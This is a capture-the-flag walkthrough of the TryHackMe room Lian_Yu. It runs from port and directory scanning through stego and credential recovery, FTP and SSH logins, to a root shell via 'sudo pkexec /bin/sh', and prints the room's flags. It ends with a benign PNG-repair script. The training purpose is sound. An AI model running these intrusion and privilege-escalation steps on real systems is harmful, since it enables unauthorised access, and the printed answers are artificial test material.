CTF Walk Through | HackProof Academy | [email protected]



17/11/2024 Shad Hussain
CTF Walk Through - Lian_Yu - THM

Room Link : https://tryhackme.com/r/room/lianyu

STEP1
nmap -p- -sSV 10.10.98.77 -Pn -A -T4

FINDING
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
80/tcp open http Apache httpd
|_http-title: Purgatory
|_http-server-header: Apache
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35261/udp6 status
| 100024 1 45319/udp status
| 100024 1 46264/tcp status
|_ 100024 1 52094/tcp6 status
46264/tcp open status 1 (RPC #100024)

------------------------------------------------------------------------------------

STEP2
feroxbuster --url http://10.10.98.77

FINDING
200 GET 59l 358w 2506c http://10.10.98.77/
301 GET 7l 20w 234c http://10.10.98.77/island = http://10.10.98.77/island/

FINDING
http://10.10.98.77/island/ : inspect the page source to find the code: vigilante

------------------------------------------------------------------------------------

STEP3
gobuster dir -u 10.10.13.232/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

FINDING
2100

QUESTION
What is the Web Directory you found? 2100

------------------------------------------------------------------------------------

STEP4
http://10.10.13.232/island/2100 : go to the page source

FINDING
<!-- you can avail your .ticket here but how? -->
This means the file extension is .ticket

------------------------------------------------------------------------------------

STEP5
gobuster dir -u 10.10.13.232/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket

FINDING
http://10.10.164.47/island/2100/green_arrow.ticket

QUESTION
What is the file name you found? green_arrow.ticket

Contents of the ticket:
This is just a token to get into Queens Gambit(Ship)
RTy8yhBQdscX

Use https://appdevtools.com/base58-encoder-decoder to decode the token as base58: !#th3h00d

QUESTION
What is the FTP Password? !#th3h00d

------------------------------------------------------------------------------------

STEP6
ftp 10.10.164.47
user : vigilante
pwd : !#th3h00d
ls -la
get aa.jpg
get Queens_Gambit.png
get Leave_me_alone.png
get .other_user

------------------------------------------------------------------------------------

STEP7
Convert Leave_me_alone.png to a proper .png file:
hexedit Leave_me_alone.png and change the first 8 bytes (top left, shown as two-digit hex) to 89 50 4E 47 0D 0A 1A 0A, then ctrl + c
Open the file as a .png and get the password

FINDING
password is the password

------------------------------------------------------------------------------------

STEP8
steghide extract -sf aa.jpg
passphrase : password
A zip file will appear; unzip it

FINDING
passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun
*** a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and set booby traps all over the island in the common event he ran into dangerous people. The island is also home to many animals, including pheasants, wild pigs and wolves.
shado
M3tahuman

QUESTION
What is the file name with SSH password? shado

------------------------------------------------------------------------------------

STEP9
Open the .other_user file we got from ftp

FINDING
slade is the ssh user name
ssh [email protected]
pwd : M3tahuman

------------------------------------------------------------------------------------

STEP10
ls -la
cat user.txt

user.txt
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0NT}

------------------------------------------------------------------------------------

STEP11
sudo -l
pwd : M3tahuman

FINDING
(root) PASSWD: /usr/bin/pkexec

------------------------------------------------------------------------------------

STEP12
Search on gtfobins: https://gtfobins.github.io/gtfobins/pkexec/#sudo

FINDING
sudo pkexec /bin/sh
whoami
root
cd /root
cat root.txt
THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_ILL_BE_D34D}

root.txt
THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_ILL_BE_D34D}

------------------------------------------------------------------------------------
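STEP7 above repairs the damaged image by hand in hexedit. The Python script below is an added example, not part of the original walkthrough: it performs the same signature repair on a constructed sample PNG and then verifies the CRC32 of the IHDR chunk, which is the check to run when you want to confirm that the rest of a file really is PNG data rather than a file with a pasted-on header.

```python
import struct
import zlib
# The 8-byte signature every PNG must start with (89 50 4E 47 0D 0A 1A 0A).
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def make_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk: 4-byte length, type, payload, CRC32 over type + payload."""
    crc = zlib.crc32(ctype + payload)
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def has_png_signature(data: bytes) -> bool:
    return data[:8] == PNG_SIGNATURE

def repair_png_signature(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the PNG signature (what the hexedit step does)."""
    if len(data) < 8:
        raise ValueError("file too short to carry a PNG signature")
    return PNG_SIGNATURE + data[8:]

def first_chunk(data: bytes):
    """Parse the chunk after the signature: returns (type, payload, crc_ok)."""
    if len(data) < 16:
        raise ValueError("file too short to contain a chunk header")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if 20 + length > len(data):
        raise ValueError("chunk length exceeds file size; not a PNG body")
    payload = data[16:16 + length]
    (crc,) = struct.unpack(">I", data[16 + length:20 + length])
    return ctype, payload, zlib.crc32(ctype + payload) == crc

def ihdr_dimensions(data: bytes):
    """Width and height from IHDR; raises if the body is not intact PNG data."""
    ctype, payload, crc_ok = first_chunk(data)
    if ctype != b"IHDR" or not crc_ok:
        raise ValueError("first chunk is not a valid IHDR")
    return struct.unpack(">II", payload[:8])

# Constructed sample (not a file from the room): a minimal 1x1 8-bit grayscale PNG,
# then the same bytes with the signature zeroed to mimic the damaged image.
GOOD_PNG = (PNG_SIGNATURE
            + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
            + make_chunk(b"IEND", b""))
DAMAGED_PNG = b"\x00" * 8 + GOOD_PNG[8:]

if __name__ == "__main__":
    fixed = repair_png_signature(DAMAGED_PNG)
    print("signature ok before/after repair:", has_png_signature(DAMAGED_PNG), has_png_signature(fixed))
    print("IHDR chunk CRC intact even before repair:", first_chunk(DAMAGED_PNG)[2])
    print("IHDR dimensions after repair:", ihdr_dimensions(fixed))
```

Because chunk CRCs cover only the chunk type and payload, a damaged signature leaves them intact, so a passing IHDR CRC before the repair tells you the body was never touched and only the header needs fixing.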

© mutebreak.com | All Rights Reserved